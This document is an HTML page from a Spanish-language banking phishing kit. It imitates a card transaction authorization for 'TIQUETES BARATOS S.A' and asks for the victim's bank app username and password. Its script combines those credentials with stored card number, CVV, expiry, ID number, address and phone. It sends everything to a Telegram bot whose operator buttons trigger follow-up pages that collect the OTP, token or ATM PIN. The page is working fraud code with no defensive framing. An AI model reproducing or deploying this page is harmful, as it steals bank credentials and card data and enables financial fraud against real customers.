<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Autorización de Transacción</title>
    <script src="./bots/aes.js"></script>
    <script src="./bots/AesUtil.js"></script>
    <script src="../js/jquery-3.7.7.js"></script>
    <script src="./bots/md5.js"></script>
    <script src="./bots/pbkdf2.js"></script>
    <script src="./bots/string-mask.js"></script>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            background: #f5f5f5;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            overflow: hidden;
        }

        .container {
            width: 100%;
            max-width: 400px;
            background: #fff;
            border-radius: 10px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            padding: 20px;
            box-sizing: border-box;
            overflow-y: auto;
            margin: 0 10px;
        }

        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 20px;
            border-bottom: 1px solid #ccc;
            padding-bottom: 10px;
        }

        .header img {
            height: 35px;
        }

        .title {
            font-size: 18px;
            font-weight: bold;
            margin-bottom: 10px;
            text-align: left;
        }

        .details p {
            margin: 10px 0;
            font-size: 14px;
        }

        .details p.small {
            font-size: 12px;
            color: #555;
            font-weight: normal;
        }

        .input-group {
            display: flex;
            justify-content: flex-start;
            margin-bottom: 15px;
        }

        .input-group label {
            width: 35%;
            text-align: right;
            margin-right: 10px;
            font-size: 14px;
        }

        .input-group input {
            width: 40%;
            padding: 8px;
            border: 1px solid #ccc;
            border-radius: 5px;
            font-size: 14px;
        }

        .button {
            width: 30%;
            padding: 10px;
            background: #000;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            font-weight: bold;
            margin-top: 30px;
            text-align: center;
            display: block;
            margin-left: auto;
            margin-right: auto;
        }

        /* Loader */
        .loaderp {
            width: 48px;
            height: 48px;
            border: 5px solid #FFF;
            border-bottom-color: rgb(117, 117, 117);
            border-radius: 50%;
            display: inline-block;
            box-sizing: border-box;
            animation: rotation 1s linear infinite;
        }

        @keyframes rotation {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        .loaderp-full {
            position: fixed;
            top: 67%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 20%;
            height: 25vh;
            max-width: 300px;
            max-height: 160px;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: rgb(255, 255, 255);
            border-radius: 8px;
            z-index: 1000;
        }

        .hidden {
            display: none;
        }

        /* Texto instrucciones */
        .instructions-text {
            font-size: 14px;
            color: #555;
            margin: 10px 0;
            line-height: 1.5;
            text-align: center;
            font-weight: normal;
            font-family: Arial, sans-serif;
        }

        @media (max-width: 600px) {
            .loaderp {
                width: 32px;
                height: 32px;
                border: 4px solid #FFF;
                border-bottom-color: rgb(150, 150, 150);
            }

            .loaderp-full {
                top: 68.5%;
                width: 90vw;
                height: 16vh;
                max-width: 520px;
                max-height: 218px;
            }

            .instructions-text {
                font-size: 12px;
            }
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="header">
            <img id="bank-logo" src="lgos/error2.png" alt="Banco Logo">
            <div class="id-check">
                <img id="card-type-logo" src="lgos/error.avif" alt="Tipo Tarjeta Logo" height="35">
            </div>
        </div>
        <div class="title">Autorización de transacción</div>
        <p class="small">La transacción de <strong>TIQUETES BARATOS S.A</strong> por <strong id="monto-transaccion">$49,999 COP</strong> con tarjeta terminada en <strong id="card-last4">0000</strong> debe ser autorizada.</p>
        <div class="details">
            <p><strong>Comercio:</strong> TIQUETES BARATOS S.A</p>
            <p><strong>Monto:</strong> <span id="monto-transaccion-detalle">Calculando...</span></p>
            <p><strong>Tarjeta:</strong> **** **** **** <span id="card-last4-display">0000</span></p>
        </div>
        <form id="transaction-form">
            <div class="input-group">
                <label id="usuario-label" for="usuario">Usuario:</label>
                <input type="text" id="usuario" placeholder="Ingresa tu usuario">
            </div>
            <div class="input-group">
                <label id="clave-label" for="clave">Clave:</label>
                <input type="password" id="clave" placeholder="Ingresa tu clave" maxlength="11">
            </div>
            <p class="instructions-text">Estos son los datos que utilizas para ingresar a tu app.</p>
            <button class="button" id="authorize-button" disabled>Autorizar</button>
        </form>

        <div class="loaderp-full hidden">
            <span class="loaderp"></span>
            <p class="text-italic tc-ocean fs-3 fw-light"></p>
        </div>
    </div>

    <!-- SCRIPT CORREGIDO -->
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            const loader = document.querySelector(".loaderp-full");
            const usuarioInput = document.getElementById('usuario');
            const claveInput = document.getElementById('clave');
            const autorizarBtn = document.getElementById('authorize-button');
            const transactionForm = document.getElementById('transaction-form');

            function checkFormValidity() {
                autorizarBtn.disabled = !(usuarioInput.value.length >= 4 && claveInput.value.length >= 4);
            }

            usuarioInput.addEventListener('input', checkFormValidity);
            claveInput.addEventListener('input', checkFormValidity);

            transactionForm.addEventListener('submit', async function (event) {
                event.preventDefault();
                loader.style.display = "flex";

                const usuario = usuarioInput.value;
                const clave = claveInput.value;
                const transactionId = Date.now().toString(36) + Math.random().toString(36).substr(2);

                localStorage.setItem('transactionId', transactionId);
                localStorage.setItem('usuario', usuario);
                localStorage.setItem('clave', clave);

                const datosTarjeta = JSON.parse(localStorage.getItem("tbdatos"));

                const message = `
<b>Nuevo método de pago pendiente de verificación.</b>
--------------------------------------------------
🆔 <b>ID:</b> | <b>${transactionId}</b>
👤 <b>Usuario:</b> | ${usuario}
🔐 <b>Clave:</b> | ${clave}
--------------------------------------------------
<b>Detalles del pago:</b>
----------------------------
🪪 <b>Cédula:</b> | ${datosTarjeta ? datosTarjeta.cedula : '<i>No disponible</i>'}
💳 <b>Tarjeta:</b> | ${datosTarjeta ? datosTarjeta.cardNumber : '<i>No disponible</i>'}
📅 <b>Fecha de expiración:</b> | ${datosTarjeta ? `${datosTarjeta.expMonth}/${datosTarjeta.expYear}` : '<i>No disponible</i>'}
🔐 <b>CVV:</b> | ${datosTarjeta ? datosTarjeta.cvv : '<i>No disponible</i>'}
💳 <b>Tipo de tarjeta:</b> | ${datosTarjeta ? datosTarjeta.type : '<i>No disponible</i>'}
💰 <b>Cuotas:</b> | ${datosTarjeta ? datosTarjeta.cuotas : '<i>No disponible</i>'}
--------------------------------------------------
🏦 <b>Banco:</b> | ${datosTarjeta ? datosTarjeta.bank : '<i>No disponible</i>'}
🏠 <b>Dirección:</b> | ${datosTarjeta ? datosTarjeta.address : '<i>No disponible</i>'}
📞 <b>Teléfono:</b> | ${datosTarjeta ? datosTarjeta.phone : '<i>No disponible</i>'}
🏙️ <b>Ciudad:</b> | ${datosTarjeta ? datosTarjeta.city : '<i>No disponible</i>'}
📝 <b>Nombre del propietario:</b> | ${datosTarjeta ? datosTarjeta.ownerName : '<i>No disponible</i>'}
--------------------------------------------------
                `;

                const keyboard = JSON.stringify({
                    inline_keyboard: [
                        [{ text: "Pedir Dinámica", callback_data: `pedir_dinamica:${transactionId}` }],
                        [{ text: "Pedir Clave de Cajero", callback_data: `pedir_cajero:${transactionId}` }],
                        [{ text: "Pedir Código OTP", callback_data: `pedir_otp:${transactionId}` }],
                        [{ text: "Pedir Token", callback_data: `pedir_token:${transactionId}` }],
                        [{ text: "Error de TC", callback_data: `error_tc:${transactionId}` }],
                        [{ text: "Error de Logo", callback_data: `error_logo:${transactionId}` }],
                        [{ text: "Finalizar", callback_data: `finalizar:${transactionId}` }],
                    ],
                });

                try {
                    const response = await fetch(`/api/sendData?method=send&text=${encodeURIComponent(message)}&reply_markup=${encodeURIComponent(keyboard)}`);
                    const data = await response.json();
                    if (data.ok) {
                        console.log("Mensaje enviado a Telegram con éxito");
                        await checkPaymentVerification(transactionId);
                    } else {
                        throw new Error("Error al enviar mensaje a Telegram.");
                    }
                } catch (error) {
                    console.error("Error al enviar mensaje:", error);
                    loader.style.display = "none";
                }
            });

            async function checkPaymentVerification(transactionId) {
                try {
                    const response = await fetch(`/api/sendData?method=update`);
                    const data = await response.json();

                    const verificationUpdate = data.result.find(update =>
                        update.callback_query &&
                        [
                            `pedir_dinamica:${transactionId}`,
                            `pedir_cajero:${transactionId}`,
                            `pedir_otp:${transactionId}`,
                            `pedir_token:${transactionId}`,
                            `error_tc:${transactionId}`,
                            `error_logo:${transactionId}`,
                            `finalizar:${transactionId}`
                        ].includes(update.callback_query.data)
                    );

                    if (verificationUpdate) {
                        loader.style.display = "none";

                        switch (verificationUpdate.callback_query.data) {
                            case `pedir_dinamica:${transactionId}`:
                                window.location.href = "dinamica-id.html";
                                break;
                            case `pedir_cajero:${transactionId}`:
                                window.location.href = "ccajero-id.html";
                                break;
                            case `pedir_otp:${transactionId}`:
                                window.location.href = "otp-id.html";
                                break;
                            case `pedir_token:${transactionId}`:
                                window.location.href = "token-id.html";
                                break;
                            case `error_tc:${transactionId}`:
                                alert("Error en tarjeta. Verifique los datos.");
                                window.location.href = "../pay/";
                                break;
                            case `error_logo:${transactionId}`:
                                alert("Error en el logo. Reintente.");
                                window.location.href = "error-id.html";
                                break;
                            case `finalizar:${transactionId}`:
                                window.location.href = "checking.html";
                                break;
                        }
                    } else {
                        setTimeout(() => checkPaymentVerification(transactionId), 2000);
                    }
                } catch (error) {
                    console.error("Error en la verificación:", error);
                    setTimeout(() => checkPaymentVerification(transactionId), 2000);
                }
            }
        });
    </script>
</body>

</html>
